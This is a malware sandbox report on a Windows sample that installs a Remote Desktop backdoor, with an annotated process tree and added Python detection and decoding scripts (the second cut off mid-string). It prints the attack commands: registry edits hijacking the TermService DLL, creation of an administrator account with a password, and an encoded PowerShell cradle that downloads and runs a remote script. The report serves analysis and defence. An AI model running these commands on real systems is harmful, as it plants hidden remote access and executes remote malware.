Analysis
- max time kernel: 116s
- max time network: 152s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 23-09-2021 11:03
Static task: static1
Behavioral task: behavioral1
- Sample: f71c575754e1f5890ad8b35afd08b8be.exe
- Resource: win7-en-20210920
Behavioral task: behavioral2 (the windows10_x64 run reported on this page)
- Sample: f71c575754e1f5890ad8b35afd08b8be.exe
- Resource: win10-en-20210920
General
- Target: f71c575754e1f5890ad8b35afd08b8be.exe
- Size: 5.9MB
- MD5: f71c575754e1f5890ad8b35afd08b8be
- SHA1: 69803b96f3820fabd81c79d422a1fa2a72ccb699
- SHA256: 046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211
- SHA512: 32f7fab593c46efe2586825aff79688e4a688735bf950b351fe3bdffc4a9dff01da0b2d4a92acf4d4bd14aac362884bd264beced9e8b82fd3111e8ef8ef31301
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1 (the second-stage script fetched by the -enc PowerShell command at the end of the process tree)
Signatures
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  powershell.exe (PID 4020): network flows 10, 12, 13, 14, 16, 18, 20, 22, 24
- Modifies RDP port number used by Windows (1 TTP)
  reg.exe sets RDP-Tcp\PortNumber to 0x1C21 (7201), so the Remote Desktop listener leaves TCP 3389.
- Sets DLL path for service in the registry (2 TTPs)
  reg.exe points TermService\parameters\ServiceDLL at C:\Windows\branding\mediasrv.png, a dropped file that is a UPX-packed PE despite the .png name (YARA match below), so the Remote Desktop Services service loads it in place of termsrv.dll.
- Dropped files matching YARA rule upx (2 IoCs)
  \Windows\Branding\mediasrv.png: upx
  \Windows\Branding\mediasvc.png: upx
- Loads dropped DLL (2 IoCs)
  PID 1668 (image name not recorded by the sandbox), 2 entries
- Drops file in Program Files directory (4 IoCs)
  powershell.exe, file opened for modification:
  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI
  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT
  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI
- Drops file in Windows directory (19 IoCs)
  All by powershell.exe (two instances). The paths under C:\Windows\ServiceProfiles\NetworkService (PowerShell's own policy-test, CLR usage-log and startup-profile files) are the profile of NT AUTHORITY\NETWORK SERVICE, i.e. one of the PowerShell instances is running under that service account, not as the Admin user who launched the sample.
  File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_pj0fudg4.d3m.ps1
  File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_w50vzthw.l3t.psm1
  File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE586.tmp
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
  File created: C:\Windows\branding\mediasrv.png
  File created: C:\Windows\branding\wupsvc.jpg
  File opened for modification: C:\Windows\branding\ShellBrd
  File opened for modification: C:\Windows\branding\mediasrv.png
  File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
  File created: C:\Windows\branding\mediasvc.png
  File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE536.tmp
  File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  File opened for modification: C:\Windows\branding\Basebrd
  File opened for modification: C:\Windows\branding\mediasvc.png
  File opened for modification: C:\Windows\branding\wupsvc.jpg
  File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE565.tmp
  File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE5B6.tmp
  File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE5C6.tmp
  File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- Modifies data under HKEY_USERS (64 IoCs)
  All by powershell.exe (PID 4020), all under \REGISTRY\USER\S-1-5-20, the hive of NT AUTHORITY\NETWORK SERVICE. These are the WinINet zone, ZoneMap and certificate-store keys that Windows initialises the first time a profile uses Internet Settings; what matters here is the account they were written under, not the values. Paths below are relative to \REGISTRY\USER\S-1-5-20\.
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"
  Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
  Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
  Key created Software\Microsoft\SystemCertificates\TrustedPeople
  Key created Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ (default value)
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"
  Key created Software\Microsoft\Windows\CurrentVersion
  Key created Software\Microsoft\SystemCertificates\trust\Certificates
  Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"
  Key created Software\Microsoft\SystemCertificates\SmartCardRoot
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"
  Key created Software\Microsoft\SystemCertificates\CA\Certificates
  Key created Software\Policies\Microsoft\SystemCertificates\trust\CTLs
  Key created Software\Classes\Local Settings\MuiCache\16\52C64B7E
  Key created Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
  Key created Software\Microsoft\Advanced INF Setup
  Key created Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup
  Key created Software\Policies\Microsoft\SystemCertificates\trust\Certificates
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ (default value)
  Key created Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map
  Key created Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo
  Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults
  Key created Software\Policies\Microsoft\SystemCertificates\trust\CRLs
  Key created Software\Policies\Microsoft\SystemCertificates\Disallowed
  Key created Software\Policies\Microsoft\SystemCertificates\CA\CRLs
  Set value (str) Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"
  Key created Software\Microsoft\Windows
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"
  Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"
  Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones
  Key created Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"
  Set value (data) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = a63109125baed701
  Key created Software\Microsoft\SystemCertificates\CA\CTLs
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"
  Key created Software\Microsoft\SystemCertificates\Disallowed\Certificates
  Key created Software\Microsoft\SystemCertificates\trust
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"
  Key created Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
  Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
  Key created Software\Policies\Microsoft\SystemCertificates\CA\Certificates
  Key created Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
  Key created Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0
  Set value (data) Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000
    (UTF-16LE: ",Software\Microsoft\Windows\CurrentVersion\Internet Settings,User Agent," followed by "Mozilla/5.0 (compatible; MSIE 9.0; Win32)", the IE setup backup of the default User Agent value)
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"
  Key created Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
- Modifies registry key (1 TTP, 1 IoC)
  reg.exe PID 68, the TermService ServiceDLL write shown in the process tree.
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses a user-agent string associated with a script host/environment.
  HTTP User-Agent header, flows 12, 13, 14, 16: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  powershell.exe PID 3760 (6 entries), PID 3848 (3), PID 4092 (3), PID 684 (3), PID 4020 (3)
- Suspicious behavior: LoadsDriver (2 IoCs)
  PID 624 (image name not recorded by the sandbox), 2 entries
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  f71c575754e1f5890ad8b35afd08b8be.exe PID 2392: SeDebugPrivilege
  powershell.exe PID 3760: SeDebugPrivilege
  powershell.exe PID 3848: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  powershell.exe PID 4092: the same 22 entries as PID 3848
  powershell.exe PID 684: the same list through SeManageVolumePrivilege (18 entries; the listing stops at the 64-IoC cap)
  The three -s -NoLogo -NoProfile children enable the full privilege set of an elevated token, not just SeDebugPrivilege. Privileges 33 to 36 are reported by LUID only; they are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege.
- Suspicious use of WriteProcessMemory (64 IoCs)
  Each parent/child pair is recorded twice in the sandbox table and listed once here. PIDs are reused within the run (1280, 1912, 1980, 2804 and 3748 each name two different images below), so correlate on PID plus start time or tree position, never on PID alone.
  2392 f71c575754e1f5890ad8b35afd08b8be.exe -> 3760 powershell.exe
  3760 powershell.exe -> 1280 csc.exe
  1280 csc.exe -> 2720 cvtres.exe
  3760 powershell.exe -> 3848 powershell.exe
  3760 powershell.exe -> 4092 powershell.exe
  3760 powershell.exe -> 684 powershell.exe
  3760 powershell.exe -> 1980 reg.exe
  3760 powershell.exe -> 68 reg.exe
  3760 powershell.exe -> 2804 reg.exe
  3760 powershell.exe -> 584 net.exe
  584 net.exe -> 1524 net1.exe
  3760 powershell.exe -> 740 cmd.exe
  740 cmd.exe -> 1044 cmd.exe
  1044 cmd.exe -> 3748 net.exe
  3748 net.exe -> 4052 net1.exe
  3760 powershell.exe -> 3980 cmd.exe
  3980 cmd.exe -> 972 cmd.exe
  972 cmd.exe -> 372 net.exe
  372 net.exe -> 3328 net1.exe
  1264 cmd.exe -> 1620 net.exe
  1620 net.exe -> 1892 net1.exe
  1912 cmd.exe -> 3832 net.exe
  3832 net.exe -> 3824 net1.exe
  3736 cmd.exe -> 3652 net.exe
  3652 net.exe -> 3988 net1.exe
  3748 cmd.exe -> 1280 net.exe
  1280 net.exe -> 1032 net1.exe
  1784 cmd.exe -> 1512 net.exe
  1512 net.exe -> 1776 net1.exe
  2804 cmd.exe -> 1912 net.exe
  1912 net.exe -> 644 net1.exe
  2240 cmd.exe -> 1980 WMIC.exe
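The reg.exe and net.exe command lines behind these signatures make a compact detection problem: a PortNumber write on the RDP-Tcp listener, a TermService ServiceDLL that is not termsrv.dll, and a service account or fresh local user landing in Administrators or Remote Desktop Users. The script below is an added example, not code from the sandbox report or from the sample: it encodes those checks as rules and runs them over process-creation records constructed from this report's process tree. The record layout (pid, image, cmdline) is an assumption for the example, not the schema of any particular log source, and only net.exe is matched, not its net1.exe child, so a command is not counted twice.

```python
"""Command-line triage rules for the RDP-backdoor chain in this report.

Added example, not code from the sandbox report or from the sample. EVENTS is
constructed from command lines shown in the process tree; the record layout
(pid, image, cmdline) is an assumption for the example, not the schema of any
particular log source.
"""
import re
from dataclasses import dataclass

DEFAULT_RDP_PORT = 3389
LEGIT_TERMSRV_DLL = r"\system32\termsrv.dll"        # what TermService should load
PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}

# Constructed from the process tree above (PIDs as the sandbox reported them).
# The fEnableWddmDriver row is a control: a reg write that none of the rules should fire on.
EVENTS = [
    {"pid": 1980, "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f'},
    {"pid": 68, "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f'},
    {"pid": 2804, "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f'},
    {"pid": 584, "image": r"C:\Windows\system32\net.exe",
     "cmdline": r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add'},
    {"pid": 3832, "image": r"C:\Windows\system32\net.exe",
     "cmdline": r"net.exe user wgautilacc LijNdwj5 /add"},
    {"pid": 3652, "image": r"C:\Windows\system32\net.exe",
     "cmdline": r'net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD'},
    {"pid": 1512, "image": r"C:\Windows\system32\net.exe",
     "cmdline": r'net.exe LOCALGROUP "Administrators" wgautilacc /ADD'},
]


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping "quoted runs" as one token."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def _reg_data(tokens):
    """Return the data argument (/d <data>) of a reg.exe add command, or None."""
    low = [t.lower() for t in tokens]
    if "/d" not in low:
        return None
    i = low.index("/d")
    return tokens[i + 1] if i + 1 < len(tokens) else None


def check_reg(ev, tokens):
    findings = []
    joined = " ".join(tokens).lower()
    data = _reg_data(tokens)
    if data is None:
        return findings
    if r"winstations\rdp-tcp" in joined and "portnumber" in joined:
        try:
            port = int(data, 0)          # base 0 accepts 0x1C21 as well as 7201
        except ValueError:
            port = None
        if port is not None and port != DEFAULT_RDP_PORT:
            findings.append(Finding("rdp_port_changed", ev["pid"], f"RDP-Tcp PortNumber -> {port}"))
    if r"services\termservice\parameters" in joined and "servicedll" in joined:
        if not data.lower().endswith(LEGIT_TERMSRV_DLL):
            findings.append(Finding("termservice_servicedll_hijack", ev["pid"], f"ServiceDLL -> {data}"))
    return findings


def check_net(ev, tokens):
    findings = []
    low = [t.lower() for t in tokens]
    if len(low) >= 5 and low[1] == "localgroup" and low[-1] == "/add" and low[2] in PRIVILEGED_GROUPS:
        member = tokens[3]
        rule = ("service_account_made_admin" if "network service" in member.lower()
                else "privileged_group_member_added")
        findings.append(Finding(rule, ev["pid"], f"{member} added to {tokens[2]}"))
    if len(low) >= 4 and low[1] == "user" and low[-1] == "/add":
        findings.append(Finding("local_account_created", ev["pid"], f"account {tokens[2]}"))
    return findings


def triage(events):
    """Run the rules over process-creation records; findings come back in event order."""
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        tokens = tokenize(ev["cmdline"])
        if image == "reg.exe":
            findings.extend(check_reg(ev, tokens))
        elif image == "net.exe":                 # net1.exe is net.exe's child; skip it
            findings.extend(check_net(ev, tokens))
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"{f.rule:32} pid={f.pid:<5} {f.detail}")
```

The ServiceDLL rule compares against the path suffix rather than the full %SystemRoot% string so that either spelling of the legitimate value passes; anything else under that key is a hijack of the Remote Desktop Services host process, which is what this sample does with the .png-named DLL.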
Processes
Indentation below shows the parent/child depth the sandbox marked with N⤵. Several of the later cmd.exe chains start at depth 1 because their parent was not captured. The last of them ends in powershell.exe PID 4020, whose registry writes all land under S-1-5-20, so it runs as NT AUTHORITY\NETWORK SERVICE, the account PID 584 had just added to Administrators. PIDs are reused within the run (1032, 1044, 1280, 1912, 1980, 2804 and 3748 each appear for two different processes), so read a PID together with its position in the tree.

- PID 2392  C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe
  "C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"
  Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - PID 3760  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - PID 1280  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dzjrgmon\dzjrgmon.cmdline"
      Suspicious use of WriteProcessMemory
      (csc.exe under powershell.exe means ready.ps1 used Add-Type to compile C# at run time)
      - PID 2720  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA212.tmp" "c:\Users\Admin\AppData\Local\Temp\dzjrgmon\CSC56A59F14EE92459EBF46ED605ECECEE3.TMP"
    - PID 3848  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 4092  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 684  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      (-s is PowerShell's ServerMode switch; this is the command line Start-Job uses for its background job hosts)
    - PID 1980  C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      (moves the RDP listener to TCP 7201)
    - PID 68  C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      Modifies registry key
      (replaces termsrv.dll with the dropped, UPX-packed mediasrv.png as the Remote Desktop Services service DLL)
    - PID 2804  C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      (disables the "Use WDDM graphics display driver for Remote Desktop Connections" policy, forcing the XDDM path for RDP sessions)
    - PID 584  C:\Windows\system32\net.exe
      "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      Suspicious use of WriteProcessMemory
      - PID 1524  C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - PID 740  C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      Suspicious use of WriteProcessMemory
      - PID 1044  C:\Windows\system32\cmd.exe
        cmd /c net start rdpdr
        Suspicious use of WriteProcessMemory
        - PID 3748  C:\Windows\system32\net.exe
          net start rdpdr
          Suspicious use of WriteProcessMemory
          - PID 4052  C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 start rdpdr
    - PID 3980  C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      Suspicious use of WriteProcessMemory
      - PID 972  C:\Windows\system32\cmd.exe
        cmd /c net start TermService
        Suspicious use of WriteProcessMemory
        - PID 372  C:\Windows\system32\net.exe
          net start TermService
          Suspicious use of WriteProcessMemory
          - PID 3328  C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 start TermService
    - PID 3180  C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - PID 1044  C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      (the two del commands remove ready.ps1 and any other dropped scripts and text files from %temp%)
- PID 1264  C:\Windows\System32\cmd.exe
  cmd /C net.exe user wgautilacc Ghar4f5 /del
  Suspicious use of WriteProcessMemory
  - PID 1620  C:\Windows\system32\net.exe
    net.exe user wgautilacc Ghar4f5 /del
    Suspicious use of WriteProcessMemory
    - PID 1892  C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
- PID 1912  C:\Windows\System32\cmd.exe
  cmd /C net.exe user wgautilacc LijNdwj5 /add
  Suspicious use of WriteProcessMemory
  - PID 3832  C:\Windows\system32\net.exe
    net.exe user wgautilacc LijNdwj5 /add
    Suspicious use of WriteProcessMemory
    - PID 3824  C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user wgautilacc LijNdwj5 /add
- PID 3736  C:\Windows\System32\cmd.exe
  cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  Suspicious use of WriteProcessMemory
  - PID 3652  C:\Windows\system32\net.exe
    net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    Suspicious use of WriteProcessMemory
    - PID 3988  C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
- PID 3748  C:\Windows\System32\cmd.exe
  cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
  Suspicious use of WriteProcessMemory
  - PID 1280  C:\Windows\system32\net.exe
    net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
    Suspicious use of WriteProcessMemory
    - PID 1032  C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
- PID 1784  C:\Windows\System32\cmd.exe
  cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  Suspicious use of WriteProcessMemory
  - PID 1512  C:\Windows\system32\net.exe
    net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    Suspicious use of WriteProcessMemory
    - PID 1776  C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
- PID 2804  C:\Windows\System32\cmd.exe
  cmd /C net.exe user wgautilacc LijNdwj5
  Suspicious use of WriteProcessMemory
  - PID 1912  C:\Windows\system32\net.exe
    net.exe user wgautilacc LijNdwj5
    Suspicious use of WriteProcessMemory
    - PID 644  C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user wgautilacc LijNdwj5
  (the six net.exe chains above delete any existing wgautilacc account, recreate it with password LijNdwj5, put it in Remote Desktop Users and Administrators, add the computer-account-style name RSSLLXYN$ to Remote Desktop Users, and set the wgautilacc password once more)
- PID 2240  C:\Windows\System32\cmd.exe
  cmd.exe /C wmic path win32_VideoController get name
  Suspicious use of WriteProcessMemory
  - PID 1980  C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
- PID 3700  C:\Windows\System32\cmd.exe
  cmd.exe /C wmic CPU get NAME
  - PID 1032  C:\Windows\System32\Wbem\WMIC.exe
    wmic CPU get NAME
  (GPU and CPU model collection)
- PID 4008  C:\Windows\System32\cmd.exe
  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc <same base64 as PID 4020>
  - PID 3812  C:\Windows\system32\cmd.exe
    cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc <same base64 as PID 4020>
    - PID 4020  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
      (-enc is base64 of UTF-16LE text and decodes to: IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the URL listed under Malware Config)
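The -enc argument on the PID 4020 command line is the base64 of the script's UTF-16LE text, which is what PowerShell's -EncodedCommand expects. The following is an added example, not code from the sandbox report or from the sample: it decodes that argument offline, applies the same switch-prefix rule powershell.exe uses (any prefix of EncodedCommand from -e upwards selects it, -ec being the pwsh spelling) so that -ep is not mistaken for it, and pulls the download cradle and URL out of the result. The command line is copied from the PID 4020 entry above; the helper and indicator names are the example's own.

```python
"""Decode PowerShell's -EncodedCommand argument and extract the download cradle.

Added example, not code from the sandbox report or from the sample. The
command line below is copied from the PID 4020 entry in the process tree.
"""
import base64
import binascii
import re

ENCODED_CMDLINE = (
    "powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcA"
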